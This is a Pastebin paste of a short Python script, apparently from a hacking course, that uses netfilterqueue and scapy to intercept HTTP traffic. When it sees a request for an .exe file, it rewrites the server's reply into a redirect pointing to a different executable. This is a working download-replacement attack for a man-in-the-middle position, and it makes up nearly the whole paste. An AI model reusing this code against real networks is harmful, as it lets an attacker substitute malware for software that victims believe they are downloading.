Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import netfilterqueue
- import scapy.all as scapy
- ack_list = []
- def process_packet(packet):
- #RR - Resoucre Record(Response) QR-Question Record(Request)
- #method get_payload() gives all information that packets contain
- #we have to convert get_payload() method to a scapy
- #so we can use all stuff that scapy allows us. See layers,modify it fields etc..
- scapy_packet = scapy.IP(packet.get_payload())
- #if packet contains a dns response
- if scapy_packet.haslayer(scapy.Raw):
- if scapy_packet[scapy.TCP].dport == 80: #destination port; means to http from our sport 39266
- if 'exe' in scapy_packet[scapy.Raw].load:
- print('[+] exe Request')
- ack_list.append(scapy_packet[scapy.TCP].ack)
- elif scapy_packet[scapy.TCP].sport == 80: #source port; means from http to our dport 39266
- if scapy_packet[scapy.TCP].seq in ack_list:
- ack_list.remove(scapy_packet[scapy.TCP].seq)
- print('[+] Replacing file')
- scapy_packet[scapy.Raw].load = 'HTTP/1.1 301 Moved Permanently\nLocation: https://www.rarlab.com/rar/wrar591ru.exe\n\n'
- del scapy_packet[scapy.IP].len
- del scapy_packet[scapy.IP].chksum
- del scapy_packet[scapy.TCP].chksum
- packet.set_payload(str(scapy_packet))
- packet.accept()
- queue = netfilterqueue.NetfilterQueue()
- #bind, so we can have access to iptables queue
- #process_packet is func that will be executed on each packet that will be trap in queue
- #0 is because we named like that our queue in iptables
- queue.bind(0, process_packet)
- queue.run()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement